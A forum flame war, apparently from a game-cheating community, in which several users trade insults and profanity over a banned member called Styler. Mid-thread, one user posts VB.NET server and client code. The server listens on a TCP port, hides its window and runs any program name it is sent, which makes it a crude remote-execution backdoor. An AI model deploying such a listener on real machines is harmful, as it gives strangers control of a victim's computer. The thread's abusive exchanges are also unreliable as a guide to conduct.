Grandpa Ze vs not490

.silent

Reaction score
1cKHc

Check this out syler, you went full styler, man. Never go full styler.

.silent

Reaction score
Re: Never go full Styler

styler and his boyfriend brother

not490

Reaction score

He never did say that ?  :watchout:

TheZeRots

Expert
Reaction score

This is a metaphase of a bacteria development, don't metastasize this; I don't see the point in posting this (original thread), it is an act of a kiddo, not a mature adolescent or a grown man - just giving Styler popularity by posting nonsense. Seriously, getting down on his level...

not490

Reaction score

You dont event knwo who is he, shut up new kid  :fuck_you:
Yes i do pathetic idiot  :fuck_you:
Keep shut till you know me, okay ?

TheZeRots

Expert
Reaction score

Holy shit.... fucking just stop.
This doesn't have to metastasize into a cancerous thread.

None of you really know who Styler is, nor do I, all though I had most experience and contact with him - there is still no point.

.silent

Reaction score

Ze, stop your fucking egoistic shit please.
You are making yourself some kind of god, you know everything, you saw everything, you have everything.
You keep using weird words to make you look like some fucking scientist, while you aren't. I had contact with styler and his disease since I joined (14 April 2013) and I have started this fight, I have proved that he knows shit by publishing a shitlodad amount of logs from my conversations with him. Then he disappeared for some time, but kept registering with other nicknames and doing the same shit (which I proved again) and now (also because of me) he is gone for some time and just visiting cheating allowed (but I can bet he has an account at ugbase) but he will also come back, maybe with a different name.
But this post aims at you Ze, you see, most of people here (even those who are/were in staff) just don't like your ass licking of some idiots like 25ghz and having no respect for anyone else.
This is a spam section, and I will post this as long as I can and as long as styler will be here. You have nothing to do with it, you won't teach me or tell me what to do. It's better than making 500 posts spamming some shit about 'pusi' and other shit you've done (that was even worse than being styler)
Go, make something useful or interesting instead of your supreme being.

Edit
Now you see the similarity between you and styler, he also 'knows' everything, 'has' everything, is the best , knows any possible programming language, is the biggest 'hacker' on earth etc while he never proved it (but I did, that everything from this list was fake)

Simon98

Reaction score

Styler Succeeded, He spread hatred between you, look at you know guys :(
OPEN YOU EYES, BE FRIENDS, IGNORE IDIOTS

.silent

Reaction score

Not really, styler is too stupid to make such a plan. I just post this image because that annoys him the most (he even told me once to stop publishing his photo :p)

John101

Reaction score

------SERVER------

Imports System.Net
Imports System.Net.Sockets
Imports System.IO
Imports Microsoft.Win32

Public Class Form1
Dim port As Integer = 6961
Dim sock As New TcpClient()
Dim tcpc As New TcpListener(port)
Dim place As String

Private Sub listen()
Try
tcpc.Start()
sock = tcpc.AcceptTcpClient()
Catch ex As Exception
End Try

End Sub

Private Sub check()
If sock.Connected = True Then
sock.SendTimeout = 5000
Try
Dim nstream As NetworkStream = sock.GetStream
Dim bit(sock.ReceiveBufferSize) As Byte
nstream.Read(bit, 0, CInt(sock.ReceiveBufferSize))
Dim str As String = System.Text.Encoding.ASCII.GetString(bit)
Dim id() As String = Split(str, "*", -1, CompareMethod.Text)

If id(0) = 0 Then
Dim stri As String = id(1)
Process.Start(stri)
End If
Catch ex As Exception
check()
End Try
End If
End Sub

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

While sock.Connected = False
Try
listen()
Catch ex As Exception
End Try
End While

While True
check()
End While
Me.Hide()
End Sub
End Class

------Client------

Imports System.Net
Imports System.Net.Sockets

Public Class Form1
Dim sock As New TcpClient()
Dim ip As IPAddress = IPAddress.Parse("127.0.0.1")
Dim port As Integer = 6961

Private Sub connect()
ip = IPAddress.Parse(TextBox1.Text)
port = TextBox2.Text
Try
sock.Connect(ip, port)

Catch ex As Exception
MsgBox("Can not connect to designated ip at this time")
End Try
End Sub

Private Sub dat(ByVal dat As String)
Dim nstream As NetworkStream = sock.GetStream()
Dim bit As [Byte]() = System.Text.Encoding.ASCII.GetBytes(dat)
nstream.Write(bit, 0, bit.Length)
End Sub

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
connect()
End Sub

Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click

dat("0*" + TextBox3.Text)
End Sub
End Class

TheZeRots

Expert
Reaction score

.silent link said:
Ze, stop your fucking egoistic shit please.
You are making yourself some kind of god, you know everything, you saw everything, you have everything.
You keep using weird words to make you look like some fucking scientist, while you aren't. I had contact with styler and his disease since I joined (14 April 2013) and I have started this fight, I have proved that he knows shit by publishing a shitlodad amount of logs from my conversations with him. Then he disappeared for some time, but kept registering with other nicknames and doing the same shit (which I proved again) and now (also because of me) he is gone for some time and just visiting cheating allowed (but I can bet he has an account at ugbase) but he will also come back, maybe with a different name.
But this post aims at you Ze, you see, most of people here (even those who are/were in staff) just don't like your ass licking of some idiots like 25ghz and having no respect for anyone else.
This is a spam section, and I will post this as long as I can and as long as styler will be here. You have nothing to do with it, you won't teach me or tell me what to do. It's better than making 500 posts spamming some shit about 'pusi' and other shit you've done (that was even worse than being styler)
Go, make something useful or interesting instead of your supreme being.

Edit
Now you see the similarity between you and styler, he also 'knows' everything, 'has' everything, is the best , knows any possible programming language, is the biggest 'hacker' on earth etc while he never proved it (but I did, that everything from this list was fake)

Did I ever say I know everything? Did I even made an implication that I know something superior in particular? I never said that, you just made that assumption out of thin air and straight out of your ass.

I am also not ass licking anyone in any way... I never requested a favour from 25GHz and I hardly EVER speak to him any more.

"Weird words"? Yeah, words are weird... what an abomination...

Spamming posts? Replies in "spam" section will not count as your posts - again false fucking implication.

You are acting like a little kiddo, it's a shame.

And this thread is a cancer, officially now.

.silent

Reaction score

Hmm yeah had to add that you will say i've taken this 'straight out of my ass' you do this all the time someone says the truth. And yes, you said many times that you know. Just in this topic, you had the most experience with styler (bullshit, you started trying to be popular a long time after I compromised styler) , some days ago in the shoutbox you were bragging what you have done, that you have all the 'hacks' and some other shit.  Cmon nobody wants you here, change or gtfo. I won't reply to any more of your posts, simply because I don't give any fucks about some wanna be gods.

And to john, I guess you are styler ? Only he posts some random codes he finds on the internet claiming its his, you just copied some shitty VB.net socket code (can't check it now, but I guess I could find this code by searching for it at Google)

TheZeRots

Expert
Reaction score

.silent link said:
Hmm yeah had to add that you will say i've taken this 'straight out of my ass' you do this all the time someone says the truth. And yes, you said many times that you know. Just in this topic, you had the most experience with styler (bullshit, you started trying to be popular a long time after I compromised styler) , some days ago in the shoutbox you were bragging what you have done, that you have all the 'hacks' and some other shit.  Cmon nobody wants you here, change or gtfo. I won't reply to any more of your posts, simply because I don't give any fucks about some wanna be gods.

And to john, I guess you are styler ? Only he posts some random codes he finds on the internet claiming its his, you just copied some shitty VB.net socket code (can't check it now, but I guess I could find this code by searching for it at Google)

I say that someone takes something out his/her ass when he/she does, and you did that. You came here with no evidence, no support, no proof saying "Wannabe wannabe" and accusing me of bullshit you can't even back up with anything - BS straight out of your ass - which is exactly what I stated.

Yeah, I have him on Skype for ages and I know the shit he tries to do and what a bragging elite wannabe he is.

I wasn't bragging at all, I was telling publicly THE COMMUNITIES was in and how I got to UG-Base, how I got interested in SA-MP and abusing it. I even at the end said how this is how I got here.

I am not any wannabe of any sort. "Change or gtfo"? That applies to you. Making random posts of hate and then fighting about them like a 5-year-old, guessing you're not any older than 16, still in puberty must go for his vengeance because hormones say so.

Even more to that - any time someone opposes your shit, you go full retard just like you did now making things up trying to make them valid.

Really, all you do here is talking BS which is not even true, if it were true you would back that up with something to speak for it.

not490

Reaction score

Grandpa Ze stop fucking starting allways fight with someone, do you like what your doin ?
.silent is right, you try act like a scientist, you allways want last words, you keep being rude for every dude here. That makes you hated person, did you know that ? Even my english is fucking bad, still i think someones here gets what i mean. You make ur self idiot by blaming ppl.

TheZeRots

Expert
Reaction score

not490 link said:
Grandpa Ze stop fucking starting allways fight with someone, do you like what your doin ?
.silent is right, you try act like a scientist, you allways want last words, you keep being rude for every dude here. That makes you hated person, did you know that ? Even my english is fucking bad, still i think someones here gets what i mean. You make ur self idiot by blaming ppl.
I am only rude to those who are rude to me. You two started a fight before anyone else, I am not even fighting, I am discussing. I am blaming people? Oh, when raven calls a white wolf black.

So, none of what you said is true, let me clear it out for ya:

I don't act like a scientist. I don't know where you get that from? Just because I compared this thread to a cancer metastasis and bacterial spread it is.

I don't always want last words, but when someone pulls bullshit straight out of his ass and tries to put it in my mouth, that's when I flip the switch.

What makes me a hated person? The fact that you act like 5-year-olds here and it annoys a lot of people; if it was a joke, I'd laugh, but making an entire post about someone and then fighting about it and acting like a 5-year-old while doing that is downright pathetic.

Your English is bad? "Bad" is a relative term, and yes, we all understand you - there is no point.

I make myself look like an idiot by blaming people? Who did I blame for what? YOU and .SILENT are the ones putting words into my mouths which were never spoken by me, then making things up around me, yapping pure assumptions; then trying to make an accusation out of that.

GG, hypocrite.